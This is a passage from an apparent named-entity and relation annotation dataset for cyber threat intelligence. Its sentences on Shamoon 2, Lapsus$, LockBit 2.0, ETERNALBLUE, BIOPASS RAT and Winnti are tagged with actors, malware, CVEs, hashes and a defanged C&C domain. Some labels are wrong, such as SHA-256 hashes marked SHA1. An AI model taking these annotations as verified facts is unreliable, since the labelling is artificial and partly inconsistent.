as high as $25 million.","entities":[{"id":47712,"label":"threat-actor","start_offset":23,"end_offset":28},{"id":47713,"label":"location","start_offset":133,"end_offset":137},{"id":47711,"label":"identity","start_offset":5,"end_offset":8}],"relations":[{"id":343,"from_id":47712,"to_id":47713,"type":"targets"}],"Comments":[]} {"id":2555,"text":" Credential theft has been known to be a key part of the Shamoon 2 attacks.","entities":[{"id":47749,"label":"attack-pattern","start_offset":1,"end_offset":17},{"id":47750,"label":"threat-actor","start_offset":57,"end_offset":66}],"relations":[{"id":348,"from_id":47750,"to_id":47749,"type":"uses"}],"Comments":[]} {"id":2557,"text":" And from this we can see how credential theft is the keystone of Shamoon 2 attacks; if an organization can prevent credential theft, the Shamoon 2 attacks can’t succeed.","entities":[{"id":47751,"label":"attack-pattern","start_offset":30,"end_offset":46},{"id":47753,"label":"attack-pattern","start_offset":116,"end_offset":132},{"id":47752,"label":"threat-actor","start_offset":66,"end_offset":75},{"id":47754,"label":"threat-actor","start_offset":138,"end_offset":147}],"relations":[{"id":346,"from_id":47752,"to_id":47751,"type":"uses"},{"id":347,"from_id":47754,"to_id":47753,"type":"uses"}],"Comments":[]} {"id":2558,"text":" In our research, we’re able to outline that Shamoon 2 enters and spreads through an organization in three stages: These stages are outlined in the image below. And that credential theft is a key element in each stage: It’s also worth noting that credentials are a keystone issue in Shamoon 2 wave 2 too: we saw evidence of targeting an organization’s virtual desktop infrastructure (VDI) solutions with default credentials.","entities":[{"id":47755,"label":"threat-actor","start_offset":45,"end_offset":54},{"id":47758,"label":"campaign","start_offset":286,"end_offset":302},{"id":47756,"label":"attack-pattern","start_offset":172,"end_offset":188}],"relations":[{"id":349,"from_id":47758,"to_id":47756,"type":"uses"}],"Comments":[]} {"id":2561,"text":"We do believe there is evidence suggestive of a connection between Shamoon 2 and the Magic Hound campaign, which could indicate these two attack campaigns could have worked in conjunction with each other to execute the Shamoon 2 attacks.","entities":[{"id":47761,"label":"campaign","start_offset":85,"end_offset":105},{"id":47760,"label":"campaign","start_offset":67,"end_offset":76},{"id":47762,"label":"campaign","start_offset":219,"end_offset":228}],"relations":[{"id":350,"from_id":47761,"to_id":47760,"type":"related-to"}],"Comments":[]} {"id":2594,"text":"In December 2021, the Ministry of Health of Brazil fell victim to an attack claimed by Lapsus$ (Figure 2).","entities":[{"id":47778,"label":"TIME","start_offset":3,"end_offset":16},{"id":47780,"label":"threat-actor","start_offset":87,"end_offset":94},{"id":47779,"label":"identity","start_offset":22,"end_offset":50}],"relations":[{"id":351,"from_id":47780,"to_id":47779,"type":"targets"}],"Comments":[]} {"id":2596,"text":"This was followed in short order by attacks on South American telecoms providers Claro and Embratel, Brazilian state-owned postal service “Correios,” and Portuguese media giant Impresa.","entities":[{"id":47784,"label":"location","start_offset":101,"end_offset":110},{"id":47785,"label":"identity","start_offset":139,"end_offset":147},{"id":47786,"label":"location","start_offset":154,"end_offset":164},{"id":47781,"label":"location","start_offset":47,"end_offset":61},{"id":47783,"label":"identity","start_offset":91,"end_offset":99},{"id":47787,"label":"identity","start_offset":176,"end_offset":184},{"id":47782,"label":"identity","start_offset":81,"end_offset":86}],"relations":[{"id":352,"from_id":47787,"to_id":47786,"type":"located-at"},{"id":353,"from_id":47785,"to_id":47784,"type":"located-at"},{"id":354,"from_id":47782,"to_id":47781,"type":"located-at"},{"id":355,"from_id":47783,"to_id":47781,"type":"located-at"}],"Comments":[]} {"id":2597,"text":"This initial focus has led to speculation that Lapsus$ Group may be Brazilian, although we understand the choice of targets to have been influenced by extended team members rather than the team leadership.","entities":[{"id":47788,"label":"threat-actor","start_offset":47,"end_offset":54},{"id":47789,"label":"location","start_offset":68,"end_offset":77}],"relations":[{"id":356,"from_id":47788,"to_id":47789,"type":"located-at"}],"Comments":[]} {"id":2598,"text":" Apart from Argentinian eCommerce provider Mercado Libre \/ Mercado Pago, subsequent victimology has departed South America and pivoted to focus on the high-tech sector. Recent public victims have included: It should be understood that in addition there are likely any number of other victims, targeted by attacks not known in the public sphere.","entities":[{"id":45606,"label":"location","start_offset":12,"end_offset":23},{"id":45608,"label":"identity","start_offset":43,"end_offset":56},{"id":45609,"label":"identity","start_offset":59,"end_offset":71},{"id":45610,"label":"location","start_offset":109,"end_offset":122}],"relations":[{"id":357,"from_id":45608,"to_id":45606,"type":"located-at"},{"id":358,"from_id":45609,"to_id":45606,"type":"located-at"},{"id":359,"from_id":45609,"to_id":45608,"type":"related-to"}],"Comments":[]} {"id":2601,"text":"For example, in the “proof” of the Okta breach posted on the Lapsus$ Group’s Telegram channel, the actor states: “… our focus was ONLY on okta customers” (Figure 3)","entities":[{"id":45614,"label":"identity","start_offset":138,"end_offset":142},{"id":45611,"label":"identity","start_offset":35,"end_offset":39},{"id":45612,"label":"threat-actor","start_offset":61,"end_offset":68},{"id":45613,"label":"SOFTWARE","start_offset":77,"end_offset":85}],"relations":[{"id":360,"from_id":45612,"to_id":45611,"type":"targets"}],"Comments":[]} {"id":2613,"text":" Although the commodity malware RedLine Stealer has been implicated for credential harvesting in some attacks, it’s unclear if this is first- or third-party, and it cannot be used as a definitive indicator of Lapsus$-specific activity.","entities":[{"id":45617,"label":"malware","start_offset":32,"end_offset":47},{"id":45618,"label":"attack-pattern","start_offset":72,"end_offset":93},{"id":45619,"label":"threat-actor","start_offset":209,"end_offset":216}],"relations":[{"id":109,"from_id":45618,"to_id":45617,"type":"delivers"}],"Comments":[]} {"id":2630,"text":"This post is also available in: 日本語 (Japanese) LockBit 2.0 is ransomware as a service (RaaS) that first emerged in June 2021 as an upgrade to its predecessor LockBit (aka ABCD Ransomware), which was first observed in September 2019.","entities":[{"id":47805,"label":"TIME","start_offset":121,"end_offset":130},{"id":47806,"label":"malware","start_offset":164,"end_offset":171},{"id":47808,"label":"TIME","start_offset":223,"end_offset":237},{"id":47804,"label":"malware","start_offset":53,"end_offset":64},{"id":47807,"label":"malware","start_offset":177,"end_offset":192}],"relations":[{"id":361,"from_id":47804,"to_id":47806,"type":"variant-of"},{"id":363,"from_id":47807,"to_id":47806,"type":"duplicate-of"}],"Comments":[]} {"id":2633,"text":" While several top-tier RaaS affiliate programs, such as Babuk, DarkSide and REvil (aka Sodinokibi) disappeared from the underground in 2021, LockBit 2.0 continued to operate and gradually became one of the most active ransomware operations.","entities":[{"id":47813,"label":"threat-actor","start_offset":88,"end_offset":98},{"id":47810,"label":"threat-actor","start_offset":57,"end_offset":62},{"id":47811,"label":"threat-actor","start_offset":64,"end_offset":72},{"id":47812,"label":"threat-actor","start_offset":77,"end_offset":82},{"id":47814,"label":"TIME","start_offset":136,"end_offset":140},{"id":47815,"label":"malware","start_offset":142,"end_offset":153}],"relations":[{"id":364,"from_id":47813,"to_id":47812,"type":"variant-of"}],"Comments":[]} {"id":2677,"text":" Technically speaking, we have observed LockBit 2.0 affiliates leveraging the following tactics, techniques and procedures: Windows SysInternals PsExec has been utilized for both persistence and execution purposes.","entities":[{"id":47880,"label":"threat-actor","start_offset":40,"end_offset":51},{"id":47879,"label":"tools","start_offset":125,"end_offset":152}],"relations":[{"id":365,"from_id":47880,"to_id":47879,"type":"uses"}],"Comments":[]} {"id":2681,"text":" The LockBit group claimed that LockBit 2.0 is “the fastest encryption software all over the world” and provided a comparative table showing the encryption speed of various ransomware samples. LockBit 2.0 also contains a self-spreading feature, clears logs and can print the ransom note on network printers until the paper runs out. A management panel that affiliates can use to manage victims and affiliate accounts, generate new ransomware builds and generate the decryptor if the demanded ransom is paid also exists.","entities":[{"id":47888,"label":"threat-actor","start_offset":5,"end_offset":12},{"id":47889,"label":"malware","start_offset":32,"end_offset":43},{"id":47890,"label":"threat-actor","start_offset":194,"end_offset":205}],"relations":[{"id":367,"from_id":47889,"to_id":47888,"type":"authored-by"}],"Comments":[]} {"id":2682,"text":"LockBit 2.0 operators also released an information-stealer dubbed StealBit, which was developed to support affiliates of the LockBit 2.0 RaaS when exfiltrating data from breached companies.","entities":[{"id":45655,"label":"malware","start_offset":66,"end_offset":74},{"id":45654,"label":"threat-actor","start_offset":0,"end_offset":11},{"id":45656,"label":"threat-actor","start_offset":125,"end_offset":136}],"relations":[{"id":111,"from_id":45655,"to_id":45654,"type":"authored-by"}],"Comments":[]} {"id":2704,"text":"On Saturday, Microsoft disclosed a critical vulnerability in Internet Explorer, CVE-2014-1776, affecting Internet Explorer versions 6 through 11.","entities":[{"id":47941,"label":"TIME","start_offset":3,"end_offset":11},{"id":47942,"label":"identity","start_offset":13,"end_offset":22},{"id":47944,"label":"vulnerability","start_offset":80,"end_offset":93},{"id":47945,"label":"SOFTWARE","start_offset":105,"end_offset":133},{"id":47943,"label":"SOFTWARE","start_offset":61,"end_offset":78}],"relations":[{"id":368,"from_id":47944,"to_id":47945,"type":"has"}],"Comments":[]} {"id":2749,"text":" Vulnerability Details CVE-2014-6271 exists in all versions of Bash and is related to how environment variables are processed when the shell starts up.","entities":[{"id":47993,"label":"vulnerability","start_offset":24,"end_offset":37},{"id":47994,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":369,"from_id":47994,"to_id":47993,"type":"has"}],"Comments":[]} {"id":2801,"text":"While the initial attack vector for these attacks is unknown, it is certain that the spread of the ransomware occurs through active exploitation of the ETERNALBLUE vulnerability (CVE-2017-0144) in Microsoft Windows.","entities":[{"id":48017,"label":"vulnerability","start_offset":179,"end_offset":192},{"id":48018,"label":"SOFTWARE","start_offset":197,"end_offset":214},{"id":8563,"label":"vulnerability","start_offset":152,"end_offset":163}],"relations":[{"id":371,"from_id":48018,"to_id":48017,"type":"has"},{"id":373,"from_id":8563,"to_id":48017,"type":"related-to"}],"Comments":[]} {"id":2816,"text":" Reports quickly emerged that this attack was effective due to the presence of code exploiting a vulnerability (CVE-2017-0144) in Microsoft Windows (code named: ETERNALBLUE) that was released as part of the Equation Group dump by the Shadow Brokers in their fifth leak on April 14, 2017.","entities":[{"id":48034,"label":"SOFTWARE","start_offset":130,"end_offset":147},{"id":48035,"label":"TIME","start_offset":272,"end_offset":286},{"id":48033,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":8600,"label":"vulnerability","start_offset":161,"end_offset":172},{"id":8601,"label":"threat-actor","start_offset":207,"end_offset":221},{"id":8602,"label":"threat-actor","start_offset":230,"end_offset":248}],"relations":[{"id":377,"from_id":48034,"to_id":48033,"type":"has"},{"id":378,"from_id":8600,"to_id":48033,"type":"related-to"},{"id":379,"from_id":8600,"to_id":8601,"type":"related-to"}],"Comments":[]} {"id":2845,"text":" The WanaCrypt0r ransomware spreads itself by heavily scanning over TCP port 445 (associated with SMB) and attempting to exploit the ETERNALBLUE vulnerability on systems.","entities":[{"id":48049,"label":"malware","start_offset":5,"end_offset":16},{"id":8683,"label":"vulnerability","start_offset":133,"end_offset":144}],"relations":[{"id":381,"from_id":48049,"to_id":8683,"type":"exploits"}],"Comments":[]} {"id":2849,"text":"It has been reported that the DOUBLEPULSAR backdoor (also from the Equation Group leak by Shadow Brokers) is installed and used to execute the malware after successful exploitation of a host via ETERNALBLUE, but this warrants further analysis.","entities":[{"id":48054,"label":"threat-actor","start_offset":67,"end_offset":81},{"id":8706,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":8709,"label":"vulnerability","start_offset":195,"end_offset":206},{"id":8704,"label":"vulnerability","start_offset":30,"end_offset":42}],"relations":[{"id":383,"from_id":48054,"to_id":8709,"type":"exploits"},{"id":382,"from_id":48054,"to_id":8704,"type":"exploits"}],"Comments":[]} {"id":2866,"text":"Late last month reports surfaced that a new Internet Explorer vulnerability (CVE-2014-1776) was being exploited in targeted attacks.","entities":[{"id":48064,"label":"SOFTWARE","start_offset":44,"end_offset":62},{"id":48065,"label":"vulnerability","start_offset":77,"end_offset":90}],"relations":[{"id":384,"from_id":48064,"to_id":48065,"type":"has"}],"Comments":[]} {"id":2879,"text":"Last year, exploitation of CVE-2013-3163 targeted Internet Explorer 8 and earlier this year, we found exploitation of CVE-2014-0322 in Internet Explorer 10.","entities":[{"id":48076,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":48077,"label":"SOFTWARE","start_offset":50,"end_offset":69},{"id":48079,"label":"SOFTWARE","start_offset":135,"end_offset":155},{"id":48078,"label":"vulnerability","start_offset":118,"end_offset":131}],"relations":[{"id":385,"from_id":48077,"to_id":48076,"type":"has"},{"id":386,"from_id":48079,"to_id":48078,"type":"has"}],"Comments":[]} {"id":3088,"text":" They grouped these vulnerabilities under the names “Spectre” (CVE-2017-5753 and CVE-2017-5715) and “Meltdown” (CVE-2017-5754).","entities":[{"id":48151,"label":"vulnerability","start_offset":63,"end_offset":76},{"id":48152,"label":"vulnerability","start_offset":81,"end_offset":94},{"id":48153,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":48154,"label":"vulnerability","start_offset":53,"end_offset":60},{"id":48155,"label":"vulnerability","start_offset":101,"end_offset":109}],"relations":[{"id":388,"from_id":48154,"to_id":48151,"type":"related-to"}],"Comments":[]} {"id":3169,"text":"We discovered a new malware that targets online gambling companies in China via a watering hole attack, in which visitors are tricked into downloading a malware loader disguised as a legitimate installer for well-known apps such as Adobe Flash Player or Microsoft Silverlight.","entities":[{"id":48286,"label":"attack-pattern","start_offset":82,"end_offset":102},{"id":48287,"label":"attack-pattern","start_offset":126,"end_offset":150},{"id":48291,"label":"malware","start_offset":16,"end_offset":27},{"id":48285,"label":"location","start_offset":70,"end_offset":75},{"id":48289,"label":"SOFTWARE","start_offset":254,"end_offset":275},{"id":48290,"label":"identity","start_offset":41,"end_offset":66},{"id":48288,"label":"SOFTWARE","start_offset":232,"end_offset":250}],"relations":[{"id":396,"from_id":48291,"to_id":48290,"type":"targets"},{"id":397,"from_id":48290,"to_id":48285,"type":"located-at"},{"id":398,"from_id":48291,"to_id":48286,"type":"uses"},{"id":399,"from_id":48291,"to_id":48287,"type":"uses"}],"Comments":[]} {"id":3173,"text":"What makes BIOPASS RAT particularly interesting is that it can sniff its victim’s screen by abusing the framework of Open Broadcaster Software (OBS) Studio, a popular live streaming and video recording app, to establish live streaming to a cloud service via Real-Time Messaging Protocol (RTMP).","entities":[{"id":48296,"label":"malware","start_offset":11,"end_offset":22},{"id":48298,"label":"SOFTWARE","start_offset":258,"end_offset":293},{"id":48297,"label":"SOFTWARE","start_offset":117,"end_offset":148}],"relations":[{"id":400,"from_id":48296,"to_id":48297,"type":"targets"}],"Comments":[]} {"id":3174,"text":"In addition, the attack misuses the object storage service (OSS) of Alibaba Cloud (Aliyun) to host the BIOPASS RAT Python scripts as well as to store the exfiltrated data from victims.","entities":[{"id":48300,"label":"malware","start_offset":103,"end_offset":114},{"id":48299,"label":"Infrastucture","start_offset":68,"end_offset":90}],"relations":[{"id":401,"from_id":48299,"to_id":48300,"type":"hosts"}],"Comments":[]} {"id":3178,"text":"Furthermore, BIOPASS RAT also creates scheduled tasks to load the Cobalt Strike shellcode during the initialization, indicating that the malicious actor behind the attack still heavily relies on Cobalt Strike.","entities":[{"id":48304,"label":"malware","start_offset":13,"end_offset":24},{"id":48305,"label":"tools","start_offset":66,"end_offset":79},{"id":48306,"label":"tools","start_offset":195,"end_offset":208}],"relations":[{"id":402,"from_id":48304,"to_id":48305,"type":"uses"}],"Comments":[]} {"id":3179,"text":" We also found several clues that show how the malware might be connected with the Winnti Group(also known as APT41). ","entities":[{"id":48308,"label":"threat-actor","start_offset":110,"end_offset":115},{"id":48307,"label":"threat-actor","start_offset":83,"end_offset":95}],"relations":[{"id":403,"from_id":48307,"to_id":48308,"type":"duplicate-of"}],"Comments":[]} {"id":3180,"text":"In this blog entry, we will dive deeper into BIOPASS RAT with a detailed technical analysis of the infection chain, the different components of the malware, and any possible associations with Winnti.","entities":[{"id":48309,"label":"threat-actor","start_offset":192,"end_offset":198},{"id":48310,"label":"malware","start_offset":45,"end_offset":56}],"relations":[{"id":404,"from_id":48310,"to_id":48309,"type":"related-to"}],"Comments":[]} {"id":3182,"text":"The initial delivery mechanism of BIOPASS RAT uses of a watering hole, a compromised website in which the malicious actors inject their custom JavaScript code to deliver malware.","entities":[{"id":48312,"label":"attack-pattern","start_offset":56,"end_offset":69},{"id":48311,"label":"malware","start_offset":34,"end_offset":45}],"relations":[{"id":405,"from_id":48311,"to_id":48312,"type":"uses"}],"Comments":[]} {"id":3199,"text":"Authenticode-signed files are either downloaded from the official websites (as seen in sample c47fabc47806961f908bed37d6b1bbbfd183d564a2d01b7cae87bd95c20ff8a5) or are hosted on Alibaba Cloud OSS on the attackers’ account.","entities":[{"id":48324,"label":"Infrastucture","start_offset":177,"end_offset":194},{"id":9783,"label":"SHA1","start_offset":94,"end_offset":158}],"relations":[{"id":406,"from_id":48324,"to_id":9783,"type":"hosts"}],"Comments":[]} {"id":3215,"text":"An old sample of the module (30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7) is likely a watchdog to check the status of another module that is known as “c1222”. The malicious actors can change this behavior by replacing the content of the cdaemon.txt service in the cloud so that when combined with the regular execution of the scheduled task, the cdaemon task can behave like a backdoor.","entities":[{"id":48338,"label":"malware","start_offset":172,"end_offset":177},{"id":48339,"label":"FILEPATH","start_offset":259,"end_offset":270},{"id":9814,"label":"SHA2","start_offset":29,"end_offset":93},{"id":9821,"label":"attack-pattern","start_offset":348,"end_offset":362}],"relations":[{"id":407,"from_id":9814,"to_id":48338,"type":"related-to"}],"Comments":[]} {"id":3281,"text":" The malware downloads OBS Studio files if the OBS folder and config file are not found in the root directory.","entities":[{"id":48378,"label":"malware","start_offset":5,"end_offset":12},{"id":48377,"label":"SOFTWARE","start_offset":23,"end_offset":33}],"relations":[{"id":408,"from_id":48378,"to_id":48377,"type":"downloads"}],"Comments":[]} {"id":3315,"text":"Although these are not implemented inside the BIOPASS RAT malware, we have observed two additional plug-ins that are written in Python (“getwechatdb” and “xss_spoof”) and were deployed by the threat actor to a victim who had been infected with Cobalt Strike.","entities":[{"id":48398,"label":"malware","start_offset":46,"end_offset":57},{"id":48399,"label":"SOFTWARE","start_offset":128,"end_offset":134},{"id":48400,"label":"tools","start_offset":244,"end_offset":257}],"relations":[{"id":409,"from_id":48398,"to_id":48400,"type":"uses"}],"Comments":[]} {"id":3336,"text":"The main script used to manipulate traffic with WinDivert Potential links with the Winnti group","entities":[{"id":48944,"label":"threat-actor","start_offset":87,"end_offset":99},{"id":48943,"label":"tools","start_offset":48,"end_offset":57}],"relations":[{"id":505,"from_id":48944,"to_id":48943,"type":"uses"}],"Comments":[]} {"id":3337,"text":"We have found several connections between BIOPASS RAT and the Winnti Group:","entities":[{"id":10096,"label":"malware","start_offset":42,"end_offset":53},{"id":48945,"label":"threat-actor","start_offset":62,"end_offset":74}],"relations":[{"id":506,"from_id":48945,"to_id":10096,"type":"uses"}],"Comments":[]} {"id":3340,"text":"It is well known that the Winnti Group has previously used stolen certificates from game studios to sign its malware.","entities":[{"id":48950,"label":"attack-pattern","start_offset":59,"end_offset":78},{"id":48949,"label":"threat-actor","start_offset":26,"end_offset":38}],"relations":[{"id":507,"from_id":48949,"to_id":48950,"type":"uses"}],"Comments":[]} {"id":3342,"text":"Information from the stolen certificates 2. While checking the stolen certificates, we found a server-side variant of the Derusbi malware sample (e5fdb754c1a7c36c288c46765c9258bb2c7f38fa2a99188a623182f877da3783) that was signed with the same stolen certificate.","entities":[{"id":10119,"label":"SHA2","start_offset":153,"end_offset":217},{"id":48955,"label":"malware","start_offset":129,"end_offset":144}],"relations":[{"id":508,"from_id":10119,"to_id":48955,"type":"indicates"}],"Comments":[]} {"id":3345,"text":"3. We found an interesting Cobalt Strike loader (a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97) that embeds a URL that leads to the BIOPASS RAT loader.","entities":[{"id":10125,"label":"SHA2","start_offset":54,"end_offset":118},{"id":10126,"label":"malware","start_offset":156,"end_offset":167},{"id":48957,"label":"tools","start_offset":32,"end_offset":45}],"relations":[{"id":509,"from_id":10125,"to_id":48957,"type":"indicates"},{"id":510,"from_id":10125,"to_id":10126,"type":"drops"}],"Comments":[]} {"id":3348,"text":"The Cobalt Strike loader, which has a PDB string “C:\\Users\\test\\Desktop\\fishmaster\\x64\\Release\\fishmaster.pdb”, connects to the C&C server “download[.]google-images[.]ml”.","entities":[{"id":48959,"label":"tools","start_offset":4,"end_offset":17},{"id":48960,"label":"FILEPATH","start_offset":50,"end_offset":109},{"id":48961,"label":"DOMAIN","start_offset":140,"end_offset":169}],"relations":[{"id":511,"from_id":48960,"to_id":48959,"type":"indicates"},{"id":514,"from_id":48959,"to_id":48961,"type":"beacons-to"}],"Comments":[]} {"id":3350,"text":"While these connections allow us to link the malware to the Winnti Group, the different targets between BIOPASS RAT and the current operations by Winnti’s that we are tracking makes associating the two more difficult.","entities":[{"id":48963,"label":"threat-actor","start_offset":60,"end_offset":72},{"id":48964,"label":"malware","start_offset":104,"end_offset":115},{"id":48965,"label":"threat-actor","start_offset":146,"end_offset":152}],"relations":[{"id":515,"from_id":48963,"to_id":48964,"type":"uses"}],"Comments":[]} {"id":3359,"text":"Indicators of Compromise (IoCs) SHA256 Filename Note Analysis 84fbf74896d2a1b62d73b9a5d0be2f627d522fc811fe08044e5485492d2d4249 big.txt BIOPASS RAT Python Script (Version 3) TrojanSpy.Python.BIOPASS.A f3c96145c9d6972df265e12accfcd1588cee8af1b67093011e31b44d0200871f c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A 0f8a87ca5f94949904804442c1a0651f99ba17ecf989f46a3b2fde8de455c4a4 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan.Python.BIOPASS.A d8b1c4ad8f31c735c51cb24e9f767649f78ef5c571769fbaac9891c899c33444 c1222.txt BIOPASS RAT Python Script (C1222 module) ","entities":[{"id":10167,"label":"SHA1","start_offset":71,"end_offset":135},{"id":10168,"label":"malware","start_offset":146,"end_offset":157},{"id":10169,"label":"SHA1","start_offset":213,"end_offset":277},{"id":10170,"label":"malware","start_offset":290,"end_offset":301},{"id":10171,"label":"SHA2","start_offset":357,"end_offset":421},{"id":10172,"label":"malware","start_offset":434,"end_offset":445},{"id":10173,"label":"SHA2","start_offset":501,"end_offset":565},{"id":10174,"label":"malware","start_offset":578,"end_offset":589},{"id":48970,"label":"FILEPATH","start_offset":137,"end_offset":144},{"id":48972,"label":"FILEPATH","start_offset":279,"end_offset":288},{"id":48975,"label":"malware","start_offset":476,"end_offset":499},{"id":48976,"label":"FILEPATH","start_offset":567,"end_offset":576},{"id":48974,"label":"FILEPATH","start_offset":423,"end_offset":432},{"id":48971,"label":"malware","start_offset":185,"end_offset":211},{"id":48973,"label":"malware","start_offset":332,"end_offset":355}],"relations":[{"id":516,"from_id":10167,"to_id":10168,"type":"indicates"},{"id":517,"from_id":48970,"to_id":10168,"type":"indicates"},{"id":519,"from_id":48970,"to_id":10167,"type":"duplicate-of"},{"id":520,"from_id":10168,"to_id":48971,"type":"duplicate-of"},{"id":521,"from_id":10169,"to_id":10170,"type":"indicates"},{"id":522,"from_id":48972,"to_id":10170,"type":"indicates"},{"id":523,"from_id":48972,"to_id":10169,"type":"duplicate-of"},{"id":524,"from_id":48973,"to_id":10170,"type":"duplicate-of"},{"id":525,"from_id":10171,"to_id":10172,"type":"indicates"},{"id":526,"from_id":48974,"to_id":10172,"type":"indicates"},{"id":527,"from_id":48975,"to_id":10172,"type":"duplicate-of"},{"id":528,"from_id":48974,"to_id":10171,"type":"duplicate-of"},{"id":529,"from_id":10173,"to_id":10174,"type":"indicates"},{"id":530,"from_id":48976,"to_id":10174,"type":"indicates"},{"id":531,"from_id":48976,"to_id":10173,"type":"duplicate-of"}],"Comments":[]} {"id":3361,"text":"Python.BIOPASS.A ee4150f18ed826c032e7407468beea3b1f738ba80b75a6be21bb8d59ee345466","entities":[{"id":10175,"label":"SHA2","start_offset":18,"end_offset":82},{"id":48977,"label":"malware","start_offset":0,"end_offset":16}],"relations":[{"id":532,"from_id":10175,"to_id":48977,"type":"indicates"}],"Comments":[]} {"id":3362,"text":"c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10176,"label":"malware","start_offset":11,"end_offset":22},{"id":48978,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":533,"from_id":48978,"to_id":10176,"type":"indicates"}],"Comments":[]} {"id":3363,"text":".Python.BIOPASS.A 34be85754a84cc44e5bb752ee3a95e2832e7be1f611dd99e9a1233c812a6dad2 c1222.txt BIOPASS RAT Python Script (C1222 module) Trojan","entities":[{"id":10177,"label":"SHA2","start_offset":19,"end_offset":83},{"id":10178,"label":"malware","start_offset":96,"end_offset":107},{"id":48979,"label":"malware","start_offset":0,"end_offset":17},{"id":48980,"label":"FILEPATH","start_offset":85,"end_offset":94}],"relations":[{"id":534,"from_id":48979,"to_id":10178,"type":"duplicate-of"},{"id":535,"from_id":48980,"to_id":10177,"type":"duplicate-of"},{"id":536,"from_id":10177,"to_id":10178,"type":"indicates"},{"id":537,"from_id":48980,"to_id":10178,"type":"indicates"}],"Comments":[]} {"id":3364,"text":".Python.BIOPASS.A 30ccfbf24b7c8cc15f85541d5ec18feb0e19e75e1e4d2bca9941e6585dad7bc7 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10180,"label":"malware","start_offset":98,"end_offset":109},{"id":10179,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48981,"label":"malware","start_offset":1,"end_offset":17},{"id":48982,"label":"FILEPATH","start_offset":85,"end_offset":96}],"relations":[{"id":538,"from_id":48982,"to_id":10179,"type":"duplicate-of"},{"id":539,"from_id":10179,"to_id":10180,"type":"indicates"},{"id":540,"from_id":48982,"to_id":10180,"type":"indicates"},{"id":541,"from_id":48981,"to_id":10180,"type":"duplicate-of"}],"Comments":[]} {"id":3365,"text":".Python.BIOPASS.A f21decb19da8d8c07066a78839ffd8af6721b1f4323f10a1df030325a1a5e159 cdaemon.txt BIOPASS RAT Python Script (Cdaemon module)","entities":[{"id":10182,"label":"malware","start_offset":98,"end_offset":109},{"id":10181,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48983,"label":"FILEPATH","start_offset":85,"end_offset":96},{"id":48984,"label":"malware","start_offset":1,"end_offset":17}],"relations":[{"id":542,"from_id":10181,"to_id":10182,"type":"indicates"},{"id":543,"from_id":48983,"to_id":10182,"type":"indicates"},{"id":544,"from_id":48983,"to_id":10181,"type":"duplicate-of"},{"id":545,"from_id":48984,"to_id":10182,"type":"duplicate-of"}],"Comments":[]} {"id":3369,"text":"cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10184,"label":"malware","start_offset":13,"end_offset":24},{"id":48986,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[{"id":547,"from_id":48986,"to_id":10184,"type":"indicates"}],"Comments":[]} {"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} {"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} {"id":3375,"text":" Backdoor.Win64.BIOPASS.A 0f18694b400e14eb995003541f16f75a5afc2478cc415a6295d171ba93565a82 flash_installer.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 11b785e77cbfa2d3849575cdfabd85d41bae3f2e0d33a77e7e2c46a45732d6e4 